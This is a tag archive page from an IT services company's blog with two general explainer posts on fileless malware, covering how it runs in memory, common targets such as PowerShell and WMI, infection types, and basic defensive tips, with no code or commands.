Posts Tagged Fileless Malware

How Does Fileless Malware Work?

Fileless malware is defined as a type of malicious software that does not rely on virus-laden files to infect a host or victim. In contrast, it makes use of applications that are commonly used to perform legitimate and justified activity for executing malicious code in resident memory of the host. As the software doesn’t create any files, it doesn’t leave any footprints making it difficult to detect and remove.

Key Targets Of Fileless Malware:

The attackers who employ fileless malware tend to gather large amount of information in short span of time. So, they tend to focus the attack on a few key targets. Two systems that form common target are:

  • PowerShell
  • Windows Management Instrumentations

The reasons why attackers choose these systems are:

  • Security technologies trust these utilities
  • Analysts tend to assume that actions of these systems are legitimate
  • These utilities provide complete control over an endpoint
  • Most organizations refrain from shutting down these systems as it will hinder business It or DevOps work

Working Of Fileless Malware:

Following are few scenarios in which fileless malware can use a system’s software, applications and protocols to install and execute malicious activity:

  • Phishing emails, malicious downloads, and links that look legitimate are used as points of entry. Once a user clicks on these links, they load to system’s memory. This enables the hackers to remotely load codes to steal confidential data.
  • Malicious code can be injected into applications that are already installed on the system and trusted by the user. After injecting the code, these applications are hijacked and executed by hackers to carry out malicious activity.
  • Attackers create fake websites that mimic legitimate business pages. When user visits these pages, the websites search for vulnerabilities in Flash plugin. These vulnerabilities are exploited to run malicious code in the browser memory.

Fileless malware is written directly to RAM of the infected system and no changes are made on the hard disk. The malware works in memory and the operations end when the system reboots.

Defending Against Fileless Malware Attacks:

The effective way to defend against fileless malware attacks is to adopt an integrated approach that addresses the entire threat lifecycle. Employing a multi-layer defense protocol enables the user to investigate every phase before, during and after the attack.

For more information on fileless malware and tips on preventing cyber-attacks on computer networks, contact Centex Technologies at (254) 213 – 4740.

, , , ,

No Comments

Understanding Fileless Malware Infections

March 30, 2016

A fileless malware infection refers to a malicious program that is written directly to a computer’s RAM, instead of storing files on the hard drive. The code is usually injected into the running processes and the data is stored in an encrypted format in the registry, making it difficult to detect as well as remove the malware. Since it is stored in the computer’s volatile memory, the infection cannot sustain a system reboot. However, fileless infections can cause maximum damage when they are active.

Fileless malware attacks are mainly aimed at:

  • Avoiding Detection: The malware often cannot be detected by elude intrusion prevention systems and antivirus programs, thereby allowing the hackers to initiate the attack.
  • Gathering Information: The hackers may steal important information stored in the computer, such as financial details, sensitive files, login credentials etc.
  • Escalating Privileges: Exploiting security flaws in the system may provide administrative access to the hackers so that they can launch bigger attacks or download more malware.

Types Of Fileless Malware Infections

  • Memory Resident: This type of fileless malware takes up the memory space of a genuine windows file. It inserts the code into the file memory and stays dormant until triggered or accessed.
  • Windows Registry: It is present in the Windows registry as the folder is not typically accessed by the users. The hacker may place malicious code in the operating system’s thumbnail cache and set the folder to delete itself once the attack is executed.
  • Rootkits: This malware masks its presence behind an application programming interface (API) in order to gain administrator access to the infected system. Fileless rootkits are often hidden at the kernel-level and thus, can remain active in spite of antivirus scan and system reboot.

Tips To Protect Against Fileless Malware

  • Keep your operating system, internet browser, software and applications updated by installing the current security patches.
  • Configure the security settings of your web browser.
  • Disable Java, JavaScript ActiveX, cookies and browser extensions that you do not use.
  • Avoid clicking on suspected URLs and email attachments from unknown sources.
  • Do not download software packages that require installing several applications on your system.
  • Frequently remove unwanted temporary files, cookies and registry files from the computer.
  • Avoid visiting malicious websites or those that use illegal ad networks.

For more tips to keep your computer system protected against fileless malware infections, feel free to contact Centex Technologies at (855) 375 – 9654.

,

No Comments